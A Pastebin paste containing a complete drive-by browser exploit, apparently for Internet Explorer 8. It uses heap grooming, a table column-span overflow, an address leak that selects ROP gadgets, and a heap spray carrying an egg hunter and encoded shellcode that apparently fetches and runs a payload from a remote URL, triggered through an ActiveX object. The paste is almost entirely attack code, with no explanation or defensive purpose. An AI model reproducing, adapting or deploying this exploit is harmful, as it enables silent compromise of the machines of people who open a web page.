Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script type='text/javascript'>
- function heapLib() {}
- heapLib.ie = function(m) {
- this.pd = "%u0c0c%u0c0c";
- while (4 + this.pd.length*2 + 2 < this.m) {
- this.pd += this.pd;
- }
- this.me = new Array();
- this.me["0"] = new Array();
- this.me["1"] = new Array();
- CollectGarbage();
- this.hlFillbins();
- };
- heapLib.ie.prototype.hlFillbins = function() {
- for (var i = 0; i < 6; i++) {
- this.me["0"].push(this.pd.substr(0, (32-6)/2));
- this.me["0"].push(this.pd.substr(0, (64-6)/2));
- this.me["0"].push(this.pd.substr(0, (256-6)/2));
- this.me["0"].push(this.pd.substr(0, (32768-6)/2));
- }
- };
- heapLib.ie.prototype.heapLib_alloc = function(a) {
- if (typeof a == "string" || a instanceof String) {
- this.me["1"].push(a.substr(0, a.length));
- }
- };
- heapLib.ie.prototype.heapLib_GC = function() {
- delete this.me["0"];
- this.me["0"] = new Array();
- CollectGarbage();
- this.hlFillbins();
- };
- heapLib.ie.prototype.heapLib_release = function() {
- delete this.me["1"];
- delete this.me["0"];
- CollectGarbage();
- };
- var heapObj = new heapLib.ie(0x20000);
- var ropGadgets;
- var ropGadgetsTable_IE8 = new Array(
- new Array(0xAE08, 0x0, 0x1FAE08, 0x2E4E3, 0x5C4B, 0x5C4A, 0x1318, 0x3F7FB, 0x25B84),
- new Array(0x80C8, 0, 0x2080C8, 0x2CE36, 0x4E65, 0x4E64, 0x1340, 0x3F3CF, 0x62B0),
- new Array(0x7A98, 0, 0x207A98, 0x2D00E, 0x4EA9, 0x4EA8, 0x137C, 0x3F54D, 0x1E924),
- new Array(0x7B58, 0, 0x207B58, 0x2D05E, 0x4EA9, 0x4EA8, 0x137C, 0x3F5ED, 0x1E914),
- new Array(0x7FC8, 0x8160, 0x207FC8, 0x2D314, 0x4EA1, 0x4EA0, 0x137C, 0x3F8F3, 0x1E9A4),
- new Array(0x7DF8, 0x7F90, 0x207DF8, 0x2D174, 0x4EA1, 0x4EA0, 0x137C, 0x3F703, 0x1E804),
- new Array(0x7DF8, 0x7F98, 0x207DF8, 0x2D20C, 0x4EC1, 0x4EC0, 0x1368, 0x3F677, 0x1E844),
- new Array(0x7DD8, 0x0, 0x207DD8, 0x176C, 0x4ED9, 0x4ED8, 0x1374, 0x3F6D7, 0x13739),
- new Array(0x7EF8, 0x8090, 0x207EF8, 0x2CDD6, 0x4E65, 0x4E64, 0x1340, 0x3F39F, 0x1E844),
- new Array(0x7BB8, 0x7D58, 0x207BB8, 0x2D170, 0x4EA1, 0x4EA0, 0x1368, 0x3F5F7, 0x1E7E4),
- new Array(0x7F58, 0x80F8, 0x207F58, 0x2D190, 0x4EA1, 0x4EA0, 0x1368, 0x3F637, 0x91C5F),
- new Array(0x3AF8, 0x0, 0x173AF8, 0x117EF, 0x1148E, 0x1148D, 0x1308, 0x9F5C9, 0x2D7FE),
- new Array(0x3930, 0x3AC8, 0x173930, 0x118FF, 0x1159E, 0x1159D, 0x134C, 0x9F4D1, 0x2D83E),
- new Array(0x3A70, 0x3C10, 0x173A70, 0x1191B, 0x115BA, 0x115B9, 0x133C, 0x9F661, 0x2D8DE),
- new Array(0x8668, 0x8800, 0x158668, 0x1B44B, 0x14F08, 0x14F07, 0x1348, 0x6F0EB, 0x2CCAE),
- new Array(0x8628, 0x87C0, 0x158628, 0x1B4EF, 0x14FA8, 0x14FA7, 0x134C, 0x6F1DB, 0x2CDEE),
- new Array(0x8528, 0x86C0, 0x158528, 0x1B4EF, 0x14FA8, 0x14FA7, 0x134C, 0x6F0DB, 0x2CDAE),
- new Array(0x82D8, 0x8478, 0x1582D8, 0x1B4E3, 0x14F88, 0x14F87, 0x133C, 0x6EFC3, 0x2CD96)
- );
- var fillbuff = new Array();
- function randString(p, s)
- {
- var r1=Math.floor(Math.random()*90)+10;
- var r2=Math.floor(Math.random()*90)+10;
- var r3=Math.floor(Math.random()*90)+10;
- var r4=Math.floor(Math.random()*90)+10;
- var ps = "%u" + r1.toString() + r2.toString()
- ps += "%u" + r3.toString() + r4.toString()
- var pa = unescape(ps);
- while (pa.length < s) pa+= pa;
- pa = p + pa.substr(0, s - p.length);
- return pa;
- }
- function LoadIeColSpan() {
- var div_container = document.getElementById("heap_allign");
- div_container.style.cssText = "display:none";
- // VIPOLNYAT ODNIM KUSKOM
- for (var i = 0; i < 4000; i += 4) {
- fillbuff[i] = randString('', 125);
- fillbuff[i+1] = randString('', 125);
- fillbuff[i+2] = randString('', 125);
- fillbuff[i+3] = document.createElement("button");
- div_container.appendChild(fillbuff[i+3]);
- }
- for (var i = 0; i < 4000; i += 4) {
- fillbuff[i] = null;
- }
- CollectGarbage();
- // END VIPOLNYAT ODNIM KUSKOM
- var oForTable = document.getElementById("table_div");
- oForTable.width = "51px";
- oForTable.style.width = "51px";
- oForTable.style.height = "1px";
- oForTable.style.overflow = "auto";
- var oTable = document.createElement("table");
- oTable.style.tableLayout = "fixed";
- oTable.style.visibility = "visible";
- oTable.width = "51";
- oTable.height = "1";
- oForTable.appendChild(oTable);
- var oRow = oTable.insertRow();
- var oColGroup = document.createElement("COLGROUP");
- oColGroup.width = "1px";
- oTable.appendChild(oColGroup);
- var oCol = document.createElement("COL");
- oCol.id = "table_col_id";
- oCol.width = "41";
- oCol.height = "1";
- oCol.span = "9";
- oColGroup.appendChild(oCol);
- var oCell = oRow.insertCell();
- oCell.innerHTML = " ";
- var oTbody = document.createElement("TBODY");
- CollectGarbage();
- setTimeout(function(){overwrite()}, 500);
- }
- var sprayContaner = new Array();
- function toUnescape(k) {
- return String.fromCharCode(k & 0xFFFF, k >> 16);
- }
- function heap_spray(r) {
- shellcode = unescape("%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u352f%u3031%u6232%u3735%u3833%u3639%u6137%u612e%u6d64%u6e69%u7268%u6573%u7672%u6369%u7365%u6f2e%u6772%u6e2f%u7765%u2f73%u6970%u7363%u6e2f%u7765%u702e%u676e%u0000");
- var eghunter = unescape("%uE485%u3575%u5FE9%uC033%u8B64%u3040%u408B%u8B0C%u1C70%u56FC%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5075%uEBE9%u514B%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%u03AD%u33C5%u0FDB%u10BE%uF238%u0874%uCBC1%u030D%u40DA%uF1EB%u1F3B%uE775%u8B5E%u245E%uDD03%u8B66%u4B0C%u468D%uFFEC%u2454%u8B0C%u03D8%u8BDD%u8B04%uC503%u5EAB%uC359%u70EB%u8BAD%u2068%u7D80%u330C%u0374%uEB96%u8BF3%u0868%uF78B%u036A%uE859%uFF99%uFFFF%uF9E2%uC033%uB866%u001C%uE02B%uDC8B%uC933%u5951%uB966%uFFFF%u8141%uFFF9%uFFFF%u777F%u515C%u1C6A%u5153%u16FF%uC085%uE774%u7B81%u0010%u0010%u7500%u81DE%u187B%u0000%u0002%uD575%u7B83%u0414%uCF75%uC933%u07B1%u038B%u448B%u2488%u548B%u0C8E%uD03B%uBD75%uF0E2%u02EB%u25EB%uC68B%uC083%u500C%u406A%u438B%u500C%u438B%u5004%u56FF%u6404%u258B%u0000%u0000%u338B%uC683%uFF24%uFFE6%u0856%uE890%uFEE1%uFFFF%uC8AA%uA3C8%uC61B%u7946%uD87E%u73E2");
- var token = shellcode.substr(0, 16);
- var code = unescape("%ue02C%u105a");
- code += toUnescape(ropGadgets[4]);
- code += toUnescape(ropGadgets[5]);
- code += toUnescape(ropGadgets[3]);
- code += toUnescape(ropGadgets[4]);
- code += toUnescape(ropGadgets[4]);
- code += toUnescape(ropGadgets[5]);
- code += toUnescape(ropGadgets[4]);
- code += toUnescape(ropGadgets[5]);
- code += toUnescape(ropGadgets[6]);
- code += toUnescape(ropGadgets[7]);
- code += toUnescape(ropGadgets[8]);
- code += unescape("%uE06C%u105A");
- code += unescape("%u0000%u105A");
- code += unescape("%u0000%u0001");
- code += unescape("%u0040%u0000");
- code += unescape("%uE000%u105A");
- code += eghunter;
- code += token;
- var nops = unescape("%uCCCC%uCCCC");
- while (nops.length < 4096) nops += nops;
- var junk_offset = nops.substring(0, 0x2);
- var block = junk_offset + code + nops.substring(0, 4096 - code.length - junk_offset.length);
- while (block.length < 100000) block += block;
- while (shellcode.length < 100000) shellcode += shellcode;
- var f = block.substring(0, 64*1024/2);
- var a = shellcode.substring(0, 64*1024/2);
- for (i=0; i<14; i++) {
- f += block.substr(0, 64*1024/2);
- }
- f += block.substr(0, (60*1024/2)-(38/2));
- for (i=0; i<14; i++) {
- a += shellcode.substr(0, 64*1024/2);
- }
- a += shellcode.substr(0, (60*1024/2)-(38/2));
- for (i=0; i < 400; i++) {
- sprayContaner[i] = heapObj.heapLib_alloc(f);
- }
- for (i=400; i < 500; i++) {
- sprayContaner[i] = heapObj.heapLib_alloc(a);
- }
- }
- function overwrite() {
- var oCol = document.getElementById("table_col_id");
- if (oCol != null) {
- oCol.width = "42765";
- oCol.span = "19";
- setTimeout(function(){findLeak()}, 500);
- }
- }
- function findLeak() {
- var leak_addr1 = -1;
- var leak_addr2 = -1;
- var leak_index = -1;
- for (var i = 1; i < 4000; i += 4)
- {
- var offset = 0;
- if (fillbuff[i].length > (0x100-6)/2)
- {
- leak_index = i;
- offset = ((0x100-6)/2 + (2 + 8)/2) * 2 + 2;
- leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
- leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
- if (leak_addr1 == 0x430043) {
- offset += 16;
- leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
- leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
- }
- }
- if (fillbuff[i + 1].length > (0x100-6)/2)
- {
- leak_index = i + 1;
- offset = (0x100-6)/2 + (2 + 8)/2;
- leak_addr1 = fillbuff[leak_index].charCodeAt(offset) + (fillbuff[leak_index].charCodeAt(offset + 1) << 16);
- leak_addr2 = fillbuff[leak_index].charCodeAt(offset + 6) + (fillbuff[leak_index].charCodeAt(offset + 7) << 16);
- }
- if (leak_index != -1)
- {
- if (leak_addr1 < 0x100000) {
- leak_addr1 = 0;
- leak_index = -1;
- break;
- }
- for (var i = 0; i < ropGadgetsTable_IE8.length; i++)
- {
- if (((leak_addr1 & 0xFFFF) == ropGadgetsTable_IE8[i][0]) &&
- ((ropGadgetsTable_IE8[i][1] == 0x0) ||
- ((leak_addr2 & 0xFFFF) == ropGadgetsTable_IE8[i][1])))
- {
- ropGadgets = ropGadgetsTable_IE8[i];
- leak_addr1 -= ropGadgets[2];
- break;
- }
- }
- if (ropGadgets == null) {
- leak_addr1 = 0;
- leak_index = -1;
- }
- break;
- }
- }
- if (leak_index != -1)
- {
- if (ropGadgets != null) {
- for (var i = 0; i < ropGadgets.length; i++) {
- ropGadgets[i] += leak_addr1;
- }
- }
- heap_spray();
- var obj = document.createElement("object");
- obj.classid = "clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4";
- document.body.appendChild(obj);
- obj = obj.object;
- var src = unescape("%ue028%u105a");
- while (src.length < 0x1002) src += src;
- src = "\\\\xxx" + src;
- src = src.substr(0, 0x1000 - 10);
- var pic = document.createElement("img");
- pic.src = src;
- pic.nameProp;
- try {
- obj.definition(0);
- obj.definition(definition);
- obj.definition;
- } catch(e) { }
- }
- }
- LoadIeColSpan();
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement